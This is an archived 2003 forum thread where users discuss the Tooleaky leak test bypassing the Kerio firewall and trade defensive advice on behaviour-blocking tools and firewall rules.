Kerio and tooleaky?

Discussion in 'other firewalls' started by notageek, Apr 9, 2003.

Thread Status:
Not open for further replies.
  1. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    I tried Tooleaky and it ran right through Kerio and said My firewall (kerio) is useless. If this is the case how do I fix it?
     
  2. CrazyM

    CrazyM Firewall Expert

    Joined:
    Feb 9, 2002
    Posts:
    2,428
    Location:
    BC, Canada
    The current release version of Kerio (v2.14) does not handle this type of program hijacking or .dll injection.

    One related post I found from the Kerio forum at DSLR:
    http://www.dslreports.com/forum/remark,2823724~root=kerio~mode=flat

    The v3.0x betas introduced measures to deal with this kind of potential vulnerability, but development stopped. Kerio is currently working on a new v3.5 which may be out shortly for beta testing. I would suspect it will also have measures to deal with this sort of thing.

    For those not familiar with tooleaky:
    http://tooleaky.zensoft.com/

    Regards,

    CrazyM
     
  3. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium -Li?ge
    Hello,

    You might run System Safety Monitor in conjunction with your FW and pass all
    leaktests with flying colours.

    Rgds,
     
  4. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,874
    Location:
    New England
    The beauty of "tooleaky" was not in its coding, but in the idea itself and its simplicity! If you look at the source code, there's really nothing to it, and yet, it can get by an awful lot of software firewalls. Or at least it could, until they started adding a lot of additional complex features to prevent this type of "exploit". Obviously, they never updated the old version of Kerio against this exploit, but most software firewalls have already or are addressing this and other exploit methods in their newer versions.

    The tooleaky concept depends entirely upon a piece of malware (tooleaky.exe in this case) being able to run a program that has been granted access out to the Internet through the firewall without the user knowing.

    You can defeat this type of exploit by not allowing any programs access out through the firewall without the user having to specifically allow them each time a new instance starts up. Well, that setup would defeat the simple tooleaky design, but, not the next thing someone thought up...

    Next they started having the malware program itself try to kill the software firewalls, or in some cases, have it "press" the confirmation buttons on the firewall alert pop-ups itself. And so went the attack mechanisms, and now the software firewall companies have to have protections from being killed from within the computer in them, protections against programs being able to click their buttons, and so on.

    There is of course one simple protection to all these types of exploits. They all require the user to download and execute a program. Safe computing habits make a formidable initial line of defense.

    After that, having the latest version of your software firewall, with all these special extra protections is what's needed, along side a safe configuration, of course.
     
  5. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,874
    Location:
    New England
    Yes, tools like SSM and Tiny Trojan Trap are the best defenses against these various exploits because they monitor and control the behavior of programs, and how they interact with the OS and each other.

    Many software firewall vendors are simply trying to build ever higher walls and other layers of defense around themselves. But, I think with every defense they add, the other side will just find a way to circumvent that. It'll go back and forth forever. :doubt:

    For anyone interested, here is what "tooleaky" itself does:
    That's all there is to it. It's a very simple attack considering how complex it is for the software firewall applications to defend against it.
     
  6. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    I swictched to Kerio from Sygate cuz you're able to make a loopback rule. I didn't want progams piggybacking on Proxo. But now I see Kerio can't block this type of stuff. I wonder is McAfee firewall 4.0 will block piggybacks and tooleaky. :) Bloat up my computer to be safe. LOL ;) I tried SSM and it gave me an error message. It don't work well with XP. I also tried LookNStop and it said something about a drive not installed. I don't know what that means but you know. Maybe I'll go back to Sygate and pray nothing piggybacks proxo will I'm online until they come up with a fix for it. :) Tanks guys for the help.
     
  7. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium -Li?ge
    Hello,

    SSM is at its best with WinXP ;)

    Don't hesitate to contact Max (bugsbunnyATe-mail.ru) if you encountered any problem.

    Rgds,
     
  8. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    I'll try it again. It could of been a bad install or a bad download. Thanks Jack.
     
  9. deadmanschest

    deadmanschest Registered Member

    Joined:
    May 6, 2002
    Posts:
    105
    Kerio and Proxo foil Tooleaky etc...

    hi notageek - I use Kerio 2.13 and Proxo, and have always beaten tooleaky, leaktest and firehole, even when I used IE...

    Do you mean that you do not get an alert that Leaktest wants access out, or that it gets out 'secretly'?

    I have three simple rules that stop them all. I allow Opera/ Phoenix access to Proxo thru localhost:8080; I disallow any other apps any access to Proxo at all; and I allow Proxo full access out to any remote address;

    When I run Leaktest or Firehole, Opera opens up and connects to my homepage, then I get an alert that 'Firewall Leak Test Utlity wants to connect to GRC' and I deny it....thats it...

    Now, if you want it to be denyed, without any alert at all. then as I understand it you need the 'application blah blah filtering' that is supposed to be coming in the newer versions...

    Now I may be wrong, I'm a novice and no one ever believes that I have always foiled leaktest, tooleaky and firehole, but its always worked for me. I think Tooleaky is hard wired to use IE, as it nevers even opens a connection on my machine, as far as I know...haha...

    Good luck

    dmc
     

    Attached Files:

  10. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    Tooleaky sneaks out without me knowing it. Kerio has a slight learning curve. Maybe the new Kerio (whenever it comes out) might be a little better. But right now I'me waiting for the new Sygate or Outpost. I'm going to jump on the first one that comes out.
     
  11. spy1

    spy1 Registered Member

    Joined:
    Dec 29, 2002
    Posts:
    3,139
    Location:
    Clover, SC
    For those of you using SSM - Does it automatically work on all user profiles in WinXP Pro? Or does it have to be configured to do so?

    I don't want to install it and then have the other users playing with it while I'm trying to learn what to do with it. Thanks. Pete
     
  12. root

    root Registered Member

    Joined:
    Feb 19, 2002
    Posts:
    1,723
    Location:
    Missouri, USA
    I haven't used it on XP, but it has a user mode, and can be password protected.
    Its a small free program, so I think there is minimal risk in installing it and checking it out.
    FWIW Pete, SSM is a must have in my security line up. If I had to choose between SSM and an AT, I would take SSM.
    The best thing about it is that there are several exploits, aka leak tests, that have not even been discovered or publicized yet, and while firewall vendors will have to react to block them, SSM is already able to.
     
  13. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    What the defference between SSM and Abtrusion Protector? Does it use less resource than Abtrusion Protection?
     
  14. SpaceCowboy

    SpaceCowboy Registered Member

    Joined:
    Oct 20, 2002
    Posts:
    40
    SSM protects all users but only the user that logs on at bootup will get the prompts for new applications. so another user that tries to install a new application will have no idea why they cant because the prompt will be on the original users screen.
     
  15. spy1

    spy1 Registered Member

    Joined:
    Dec 29, 2002
    Posts:
    3,139
    Location:
    Clover, SC
    Thank you, root and SC. I'm liking the sound of it more and more. Pete
     
  16. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium -Li?ge
    Hello,

    SSM uses about 6 Mo Ram on my system WinXP PRo, I don't remember how much for AP.

    SSM is compatible with non NT OS AP is not.

    The biggest issue with AP is that you must be ABSOLUTELY sure you OS is clean : when installing, it scans all exe and dll and everything is considered as trusted by default, as well an installed walware.

    Rgds,
     
  17. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    Thanks Jack.
     
Thread Status:
Not open for further replies.